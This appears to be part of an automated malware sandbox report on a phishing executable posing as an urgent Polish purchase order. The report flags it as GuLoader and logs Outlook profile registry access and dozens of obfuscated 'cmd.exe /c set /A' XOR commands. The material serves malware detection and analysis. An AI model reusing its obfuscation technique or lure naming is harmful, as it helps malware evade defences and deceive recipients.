            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_0040431C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: f:\bluetooth8.0.1.57\sw\src\WIN8_Mainline\ExtArch\UI\Win7UI\Prism\Composite.UnityExtensions\obj\x64\Release\Microsoft.Practices.Composite.UnityExtensions.pdb source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13038087262.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Practices.Composite.UnityExtensions.dll.1.dr

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.14100531174.00000000058D8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe PID: 4904, type: MEMORYSTR
            Obfuscated command line found
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
